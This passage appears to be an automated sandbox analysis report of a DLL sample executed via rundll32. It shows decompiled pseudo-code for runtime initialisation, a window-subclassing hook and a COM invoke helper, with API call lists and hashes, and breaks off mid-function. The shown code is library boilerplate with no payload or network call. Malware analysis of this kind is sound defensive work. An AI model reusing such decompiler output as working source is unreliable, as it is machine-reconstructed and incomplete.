                                                                                                                                  					 *0x1005793c = GetProcAddress(_t38, "FlsSetValue");
                                                                                                                                  					_t7 = GetProcAddress(_t38, "FlsFree");
                                                                                                                                  					__eflags =  *0x10057934;
                                                                                                                                  					_t41 = TlsSetValue;
                                                                                                                                  					 *0x10057940 = _t7;
                                                                                                                                  					if( *0x10057934 == 0) {
                                                                                                                                  						L6:
                                                                                                                                  						 *0x10057938 = TlsGetValue;
                                                                                                                                  						 *0x10057934 = E10035111;
                                                                                                                                  						 *0x1005793c = _t41;
                                                                                                                                  						 *0x10057940 = TlsFree;
                                                                                                                                  					} else {
                                                                                                                                  						__eflags =  *0x10057938;
                                                                                                                                  						if( *0x10057938 == 0) {
                                                                                                                                  							goto L6;
                                                                                                                                  						} else {
                                                                                                                                  							__eflags =  *0x1005793c;
                                                                                                                                  							if( *0x1005793c == 0) {
                                                                                                                                  								goto L6;
                                                                                                                                  							} else {
                                                                                                                                  								__eflags = _t7;
                                                                                                                                  								if(_t7 == 0) {
                                                                                                                                  									goto L6;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t10 = TlsAlloc();
                                                                                                                                  					__eflags = _t10 - 0xffffffff;
                                                                                                                                  					 *0x100547c8 = _t10;
                                                                                                                                  					if(_t10 == 0xffffffff) {
                                                                                                                                  						L15:
                                                                                                                                  						_t11 = 0;
                                                                                                                                  						__eflags = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t12 = TlsSetValue(_t10,  *0x10057938);
                                                                                                                                  						__eflags = _t12;
                                                                                                                                  						if(_t12 == 0) {
                                                                                                                                  							goto L15;
                                                                                                                                  						} else {
                                                                                                                                  							E100310CD();
                                                                                                                                  							 *0x10057934 = E10035042( *0x10057934);
                                                                                                                                  							 *0x10057938 = E10035042( *0x10057938);
                                                                                                                                  							 *0x1005793c = E10035042( *0x1005793c);
                                                                                                                                  							 *0x10057940 = E10035042( *0x10057940);
                                                                                                                                  							_t18 = E10035923();
                                                                                                                                  							__eflags = _t18;
                                                                                                                                  							if(_t18 == 0) {
                                                                                                                                  								L14:
                                                                                                                                  								E10035178(_t37);
                                                                                                                                  								goto L15;
                                                                                                                                  							} else {
                                                                                                                                  								_push(E10035304);
                                                                                                                                  								_t21 =  *((intOrPtr*)(E100350AE( *0x10057934)))();
                                                                                                                                  								__eflags = _t21 - 0xffffffff;
                                                                                                                                  								 *0x100547c4 = _t21;
                                                                                                                                  								if(_t21 == 0xffffffff) {
                                                                                                                                  									goto L14;
                                                                                                                                  								} else {
                                                                                                                                  									_t43 = E10035840(1, 0x214);
                                                                                                                                  									__eflags = _t43;
                                                                                                                                  									if(_t43 == 0) {
                                                                                                                                  										goto L14;
                                                                                                                                  									} else {
                                                                                                                                  										_push(_t43);
                                                                                                                                  										_push( *0x100547c4);
                                                                                                                                  										__eflags =  *((intOrPtr*)(E100350AE( *0x1005793c)))();
                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                  											goto L14;
                                                                                                                                  										} else {
                                                                                                                                  											_push(0);
                                                                                                                                  											_push(_t43);
                                                                                                                                  											E100351B5(_t30, _t37, _t38, _t43, __eflags);
                                                                                                                                  											_t26 = GetCurrentThreadId();
                                                                                                                                  											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
                                                                                                                                  											 *_t43 = _t26;
                                                                                                                                  											_t11 = 1;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					return _t11;
                                                                                                                                  				} else {
                                                                                                                                  					E10035178(_t37);
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  			}


















                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                                  • __mtterm.LIBCMT ref: 100354A0
                                                                                                                                    • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                                    • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                                    • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                                    • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                                  • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                                  • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                                  • __init_pointers.LIBCMT ref: 10035552
                                                                                                                                  • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                                  • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                                  • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                                  • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                                  • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                                  • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                                  • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                  • API String ID: 4287529916-3819984048
                                                                                                                                  • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                                  • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                                  • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                                  • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E1001C915(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				void* _t55;
                                                                                                                                  				signed int _t56;
                                                                                                                                  				void* _t59;
                                                                                                                                  				long _t60;
                                                                                                                                  				signed int _t64;
                                                                                                                                  				void* _t66;
                                                                                                                                  				short _t72;
                                                                                                                                  				signed int _t74;
                                                                                                                                  				signed int _t76;
                                                                                                                                  				long _t83;
                                                                                                                                  				signed int _t86;
                                                                                                                                  				signed short _t87;
                                                                                                                                  				signed int _t88;
                                                                                                                                  				int _t94;
                                                                                                                                  				void* _t107;
                                                                                                                                  				long* _t109;
                                                                                                                                  				long _t111;
                                                                                                                                  				signed int _t112;
                                                                                                                                  				CHAR* _t113;
                                                                                                                                  				intOrPtr _t114;
                                                                                                                                  				void* _t117;
                                                                                                                                  				void* _t120;
                                                                                                                                  				intOrPtr _t121;
                                                                                                                                  
                                                                                                                                  				_t120 = __eflags;
                                                                                                                                  				_t106 = __edi;
                                                                                                                                  				_push(0x148);
                                                                                                                                  				E10030D90(E1004429C, __ebx, __edi, __esi);
                                                                                                                                  				_t111 =  *(_t117 + 0x10);
                                                                                                                                  				_t94 =  *(_t117 + 0xc);
                                                                                                                                  				_push(E10015B30);
                                                                                                                                  				 *(_t117 - 0x120) = _t111;
                                                                                                                                  				_t54 = E10020C26(_t94, 0x100575a4, __edi, _t111, _t120);
                                                                                                                                  				_t121 = _t54;
                                                                                                                                  				_t97 = 0 | _t121 == 0x00000000;
                                                                                                                                  				 *((intOrPtr*)(_t117 - 0x11c)) = _t54;
                                                                                                                                  				if(_t121 == 0) {
                                                                                                                                  					_t54 = E100201F1(_t97);
                                                                                                                                  				}
                                                                                                                                  				if( *(_t117 + 8) == 3) {
                                                                                                                                  					_t107 =  *_t111;
                                                                                                                                  					_t112 =  *(_t54 + 0x14);
                                                                                                                                  					_t55 = E1001F9FC(_t94, _t107, _t112, __eflags);
                                                                                                                                  					__eflags = _t112;
                                                                                                                                  					_t56 =  *(_t55 + 0x14) & 0x000000ff;
                                                                                                                                  					 *(_t117 - 0x124) = _t56;
                                                                                                                                  					if(_t112 != 0) {
                                                                                                                                  						L7:
                                                                                                                                  						__eflags =  *0x10057854;
                                                                                                                                  						if( *0x10057854 == 0) {
                                                                                                                                  							L12:
                                                                                                                                  							__eflags = _t112;
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								__eflags =  *0x10057454;
                                                                                                                                  								if( *0x10057454 != 0) {
                                                                                                                                  									L19:
                                                                                                                                  									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x10057454; // 0x0
                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                  										L23:
                                                                                                                                  										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                                                                                                                                  										__eflags = _t59;
                                                                                                                                  										 *(_t117 - 0x14) = _t59;
                                                                                                                                  										if(_t59 != 0) {
                                                                                                                                  											_t113 = "AfxOldWndProc423";
                                                                                                                                  											_t64 = GetPropA(_t94, _t113);
                                                                                                                                  											__eflags = _t64;
                                                                                                                                  											if(_t64 == 0) {
                                                                                                                                  												SetPropA(_t94, _t113,  *(_t117 - 0x14));
                                                                                                                                  												_t66 = GetPropA(_t94, _t113);
                                                                                                                                  												__eflags = _t66 -  *(_t117 - 0x14);
                                                                                                                                  												if(_t66 ==  *(_t117 - 0x14)) {
                                                                                                                                  													GlobalAddAtomA(_t113);
                                                                                                                                  													SetWindowLongA(_t94, 0xfffffffc, E1001C7D1);
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  										L27:
                                                                                                                                  										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
                                                                                                                                  										_t60 = CallNextHookEx( *(_t106 + 0x28), 3, _t94,  *(_t117 - 0x120));
                                                                                                                                  										__eflags =  *(_t117 - 0x124);
                                                                                                                                  										_t111 = _t60;
                                                                                                                                  										if( *(_t117 - 0x124) != 0) {
                                                                                                                                  											UnhookWindowsHookEx( *(_t106 + 0x28));
                                                                                                                                  											_t50 = _t106 + 0x28;
                                                                                                                                  											 *_t50 =  *(_t106 + 0x28) & 0x00000000;
                                                                                                                                  											__eflags =  *_t50;
                                                                                                                                  										}
                                                                                                                                  										goto L30;
                                                                                                                                  									}
                                                                                                                                  									goto L27;
                                                                                                                                  								}
                                                                                                                                  								_t114 = 0x30;
                                                                                                                                  								E10030030(_t107, _t117 - 0x154, 0, _t114);
                                                                                                                                  								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
                                                                                                                                  								_push(_t117 - 0x154);
                                                                                                                                  								_push("#32768");
                                                                                                                                  								_push(0);
                                                                                                                                  								_t72 = E10019B2E(_t94, _t107, "#32768", __eflags);
                                                                                                                                  								__eflags = _t72;
                                                                                                                                  								 *0x10057454 = _t72;
                                                                                                                                  								if(_t72 == 0) {
                                                                                                                                  									_t74 = GetClassNameA(_t94, _t117 - 0x118, 0x100);
                                                                                                                                  									__eflags = _t74;
                                                                                                                                  									if(_t74 == 0) {
                                                                                                                                  										goto L23;
                                                                                                                                  									}
                                                                                                                                  									 *((char*)(_t117 - 0x19)) = 0;
                                                                                                                                  									_t76 = E10032D2F(_t117 - 0x118, "#32768");
                                                                                                                                  									__eflags = _t76;
                                                                                                                                  									if(_t76 == 0) {
                                                                                                                                  										goto L27;
                                                                                                                                  									}
                                                                                                                                  									goto L23;
                                                                                                                                  								}
                                                                                                                                  								goto L19;
                                                                                                                                  							}
                                                                                                                                  							E1001FA48(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
                                                                                                                                  							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
                                                                                                                                  							E1001B083(_t112, _t117, _t94);
                                                                                                                                  							 *((intOrPtr*)( *_t112 + 0x50))();
                                                                                                                                  							_t109 =  *((intOrPtr*)( *_t112 + 0xf0))();
                                                                                                                                  							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001B780);
                                                                                                                                  							__eflags = _t83 - E1001B780;
                                                                                                                                  							if(_t83 != E1001B780) {
                                                                                                                                  								 *_t109 = _t83;
                                                                                                                                  							}
                                                                                                                                  							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
                                                                                                                                  							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
                                                                                                                                  							__eflags =  *(_t117 - 0x14);
                                                                                                                                  							if( *(_t117 - 0x14) != 0) {
                                                                                                                                  								_push( *(_t117 - 0x18));
                                                                                                                                  								_push(0);
                                                                                                                                  								E1001F30C();
                                                                                                                                  							}
                                                                                                                                  							goto L27;
                                                                                                                                  						}
                                                                                                                                  						_t86 = GetClassLongA(_t94, 0xffffffe6);
                                                                                                                                  						__eflags = _t86 & 0x00010000;
                                                                                                                                  						if((_t86 & 0x00010000) != 0) {
                                                                                                                                  							goto L27;
                                                                                                                                  						}
                                                                                                                                  						_t87 =  *(_t107 + 0x28);
                                                                                                                                  						__eflags = _t87 - 0xffff;
                                                                                                                                  						if(_t87 <= 0xffff) {
                                                                                                                                  							 *(_t117 - 0x18) = 0;
                                                                                                                                  							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
                                                                                                                                  							_t87 = _t117 - 0x18;
                                                                                                                                  						}
                                                                                                                                  						_t88 = E10014B55(_t87, "ime");
                                                                                                                                  						__eflags = _t88;
                                                                                                                                  						if(_t88 == 0) {
                                                                                                                                  							goto L27;
                                                                                                                                  						}
                                                                                                                                  						goto L12;
                                                                                                                                  					}
                                                                                                                                  					__eflags =  *(_t107 + 0x20) & 0x40000000;
                                                                                                                                  					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
                                                                                                                                  						goto L27;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t56;
                                                                                                                                  					if(_t56 != 0) {
                                                                                                                                  						goto L27;
                                                                                                                                  					}
                                                                                                                                  					goto L7;
                                                                                                                                  				} else {
                                                                                                                                  					CallNextHookEx( *(_t54 + 0x28),  *(_t117 + 8), _t94, _t111);
                                                                                                                                  					L30:
                                                                                                                                  					return E10030E13(_t94, _t106, _t111);
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                                    • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                                  • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                                  • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                                  • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                                  • _memset.LIBCMT ref: 1001CA70
                                                                                                                                  • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                                  • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                                  • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                                  • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                                  • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                                  • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                                  • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                                  • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                                  • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                                  • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                                  • API String ID: 867647115-4034971020
                                                                                                                                  • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                                  • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                                  • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                                  • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                  			E1002DB49(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                  				void* _t190;
                                                                                                                                  				signed int _t194;
                                                                                                                                  				intOrPtr* _t200;
                                                                                                                                  				signed int _t203;
                                                                                                                                  				signed int _t206;
                                                                                                                                  				intOrPtr* _t208;
                                                                                                                                  				intOrPtr _t211;
                                                                                                                                  				char _t230;
                                                                                                                                  				CHAR* _t236;
                                                                                                                                  				intOrPtr _t237;
                                                                                                                                  				signed short _t240;
                                                                                                                                  				signed int _t241;
                                                                                                                                  				signed int _t242;
                                                                                                                                  				signed int _t250;
                                                                                                                                  				signed int* _t257;
                                                                                                                                  				signed int _t258;
                                                                                                                                  				signed int _t277;
                                                                                                                                  				signed short* _t278;
                                                                                                                                  				signed short* _t279;
                                                                                                                                  				signed int _t290;
                                                                                                                                  				signed int _t291;
                                                                                                                                  				intOrPtr* _t293;
                                                                                                                                  				CHAR* _t295;
                                                                                                                                  				intOrPtr* _t296;
                                                                                                                                  				intOrPtr _t297;
                                                                                                                                  				signed int** _t299;
                                                                                                                                  				void* _t300;
                                                                                                                                  				void* _t301;
                                                                                                                                  				void* _t302;
                                                                                                                                  				void* _t313;
                                                                                                                                  
                                                                                                                                  				_push(0x7c);
                                                                                                                                  				_t190 = E10030D27(E10044FCE, __ebx, __edi, __esi);
                                                                                                                                  				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
                                                                                                                                  				_t257 = 0;
                                                                                                                                  				if( *((intOrPtr*)(__ecx)) == 0) {
                                                                                                                                  					L78:
                                                                                                                                  					return E10030DFF(_t190);
                                                                                                                                  				}
                                                                                                                                  				 *((intOrPtr*)(_t300 - 0x54)) = 0;
                                                                                                                                  				 *((intOrPtr*)(_t300 - 0x50)) = 0;
                                                                                                                                  				 *(_t300 - 0x4c) = 0;
                                                                                                                                  				 *((intOrPtr*)(_t300 - 0x48)) = 0;
                                                                                                                                  				 *(_t300 - 4) = 0;
                                                                                                                                  				E10030030(__edi, _t300 - 0x54, 0, 0x10);
                                                                                                                                  				_t302 = _t301 + 0xc;
                                                                                                                                  				if( *(_t300 + 0x18) != 0) {
                                                                                                                                  					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
                                                                                                                                  				}
                                                                                                                                  				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
                                                                                                                                  				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
                                                                                                                                  					 *((intOrPtr*)(_t300 - 0x48)) = 1;
                                                                                                                                  					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
                                                                                                                                  				}
                                                                                                                                  				 *((intOrPtr*)(_t300 - 0x68)) = 0x100492f8;
                                                                                                                                  				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
                                                                                                                                  				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
                                                                                                                                  				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
                                                                                                                                  				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
                                                                                                                                  				_t194 =  *(_t300 - 0x4c);
                                                                                                                                  				_t308 = _t194 - _t257;
                                                                                                                                  				 *(_t300 - 4) = 1;
                                                                                                                                  				_t293 = 4;
                                                                                                                                  				if(_t194 == _t257) {
                                                                                                                                  					L37:
                                                                                                                                  					_t295 = 0;
                                                                                                                                  					E1002BDD9(_t300 - 0x44);
                                                                                                                                  					if( *(_t300 + 0x10) != _t257) {
                                                                                                                                  						_t295 = _t300 - 0x44;
                                                                                                                                  					}
                                                                                                                                  					E10030030(_t293, _t300 - 0x88, _t257, 0x20);
                                                                                                                                  					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
                                                                                                                                  					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
                                                                                                                                  					_t289 = _t300 - 0x54;
                                                                                                                                  					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1004b61c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
                                                                                                                                  					E1002DAF2(_t300 - 0x68);
                                                                                                                                  					_t203 =  *(_t300 - 0x4c);
                                                                                                                                  					if(_t203 == _t257) {
                                                                                                                                  						L46:
                                                                                                                                  						_push( *((intOrPtr*)(_t300 - 0x54)));
                                                                                                                                  						E10014517(_t257, _t289, _t293, _t295, _t319);
                                                                                                                                  						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
                                                                                                                                  						if( *(_t300 + 0xc) >= _t257) {
                                                                                                                                  							L61:
                                                                                                                                  							_t295 =  *(_t300 + 0x10);
                                                                                                                                  							if(_t295 == _t257) {
                                                                                                                                  								L76:
                                                                                                                                  								 *(_t300 - 4) = 0;
                                                                                                                                  								_t190 = E1002CDE9(_t300 - 0x68, _t289);
                                                                                                                                  								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
                                                                                                                                  								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                  									_push( *((intOrPtr*)(_t300 - 0x54)));
                                                                                                                                  									_t190 = E10014517(_t257, _t289, _t293, _t295, __eflags);
                                                                                                                                  								}
                                                                                                                                  								goto L78;
                                                                                                                                  							}
                                                                                                                                  							if(_t295 == 0xc) {
                                                                                                                                  								L65:
                                                                                                                                  								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
                                                                                                                                  								__eflags = _t206 - 0x13;
                                                                                                                                  								if(_t206 > 0x13) {
                                                                                                                                  									goto L76;
                                                                                                                                  								}
                                                                                                                                  								switch( *((intOrPtr*)(_t206 * 4 +  &M1002E0D9))) {
                                                                                                                                  									case 0:
                                                                                                                                  										__eax =  *(__ebp + 0x14);
                                                                                                                                  										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                                  										goto L76;
                                                                                                                                  									case 1:
                                                                                                                                  										__eax =  *(__ebp + 0x14);
                                                                                                                                  										__ecx =  *(__ebp - 0x3c);
                                                                                                                                  										 *( *(__ebp + 0x14)) = __ecx;
                                                                                                                                  										goto L76;
                                                                                                                                  									case 2:
                                                                                                                                  										__eax =  *(__ebp + 0x14);
                                                                                                                                  										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                                  										goto L76;
                                                                                                                                  									case 3:
                                                                                                                                  										__eax =  *(__ebp + 0x14);
                                                                                                                                  										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                                  										goto L76;
                                                                                                                                  									case 4:
                                                                                                                                  										__ecx =  *(__ebp - 0x3c);
                                                                                                                                  										__eax =  *(__ebp + 0x14);
                                                                                                                                  										 *__eax =  *(__ebp - 0x3c);
                                                                                                                                  										__ecx =  *(__ebp - 0x38);
                                                                                                                                  										 *(__eax + 4) = __ecx;
                                                                                                                                  										goto L76;
                                                                                                                                  									case 5:
                                                                                                                                  										__eax = E1002BC90(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
                                                                                                                                  										_push( *(__ebp - 0x3c));
                                                                                                                                  										__imp__#6();
                                                                                                                                  										goto L76;
                                                                                                                                  									case 6:
                                                                                                                                  										__ecx =  *(__ebp + 0x14);
                                                                                                                                  										__eax = 0;
                                                                                                                                  										__eflags =  *(__ebp - 0x3c) - __bx;
                                                                                                                                  										__eax = 0 | __eflags != 0x00000000;
                                                                                                                                  										 *__ecx = __eflags != 0;
                                                                                                                                  										goto L76;
                                                                                                                                  									case 7:
                                                                                                                                  										__edi =  *(__ebp + 0x14);
                                                                                                                                  										__esi = __ebp - 0x44;
                                                                                                                                  										asm("movsd");
                                                                                                                                  										asm("movsd");
                                                                                                                                  										asm("movsd");
                                                                                                                                  										asm("movsd");
                                                                                                                                  										__ebx = 0;
                                                                                                                                  										goto L76;
                                                                                                                                  									case 8:
                                                                                                                                  										goto L76;
                                                                                                                                  									case 9:
                                                                                                                                  										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
                                                                                                                                  										goto L76;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							_t208 = _t300 - 0x44;
                                                                                                                                  							__imp__#12(_t208, _t208, _t257, _t295);
                                                                                                                                  							_t293 = _t208;
                                                                                                                                  							_t321 = _t293 - _t257;
                                                                                                                                  							if(_t293 >= _t257) {
                                                                                                                                  								goto L65;
                                                                                                                                  							}
                                                                                                                                  							__imp__#9(_t300 - 0x44);
                                                                                                                                  							_push(_t293);
                                                                                                                                  							L49:
                                                                                                                                  							E1001FCED(_t257, _t293, _t295, _t321);
                                                                                                                                  							L50:
                                                                                                                                  							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
                                                                                                                                  							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
                                                                                                                                  								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
                                                                                                                                  							}
                                                                                                                                  							_t211 = E100144EC(_t322, 0x20);
                                                                                                                                  							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
                                                                                                                                  							_t323 = _t211 - _t257;
                                                                                                                                  							 *(_t300 - 4) = 4;
                                                                                                                                  							if(_t211 != _t257) {
                                                                                                                                  								_push( *((intOrPtr*)(_t300 - 0x88)));
                                                                                                                                  								_push(_t257);
                                                                                                                                  								_push(_t257);
                                                                                                                                  								_t257 = E1002D549(_t257, _t211, _t293, _t295, _t323);
                                                                                                                                  							}
                                                                                                                                  							_push( *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                                  							_t293 = __imp__#7;
                                                                                                                                  							 *(_t300 - 4) = 1;
                                                                                                                                  							if( *_t293() != 0) {
                                                                                                                                  								_t139 = _t257 + 0x18; // 0x18
                                                                                                                                  								E1001FF59(_t139,  *((intOrPtr*)(_t300 - 0x84)));
